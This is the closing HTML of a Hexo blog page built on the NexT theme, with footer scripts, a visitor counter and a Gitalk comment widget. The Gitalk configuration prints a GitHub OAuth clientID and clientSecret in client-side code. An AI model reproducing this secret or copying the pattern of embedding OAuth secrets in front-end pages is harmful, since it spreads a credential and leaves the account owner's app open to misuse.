  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/theme-next/hexo-theme-next">NexT.Gemini</a> v6.3.0</div>




        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv" title="总访客量">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="site-pv" title="总访问量">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>












  















  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.3.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.3.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.3.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.3.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.3.0"></script>



  



	





  





  










  
    
    <script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
    <script src="https://cdn.bootcss.com/blueimp-md5/2.10.0/js/md5.js"></script>
    <script type="text/javascript">
      const gitalk = new Gitalk({
      clientID: '537645cf6d6949758c66',
      clientSecret: '37dec31ad65f8f14aabd79039821626b7577c14c',
      repo: 'JackoQm.github.io',
      owner: 'JackoQm',
      admin: 'JackoQm'.split(','),
      pagerDirection: 'first',
      id: md5(window.location.pathname),
      distractionFreeMode: false
      })
      gitalk.render('gitalk-container')
    </script>
    
  




  





  

  

  

  

  
  

  

  

  

  

  


</body>
</html>
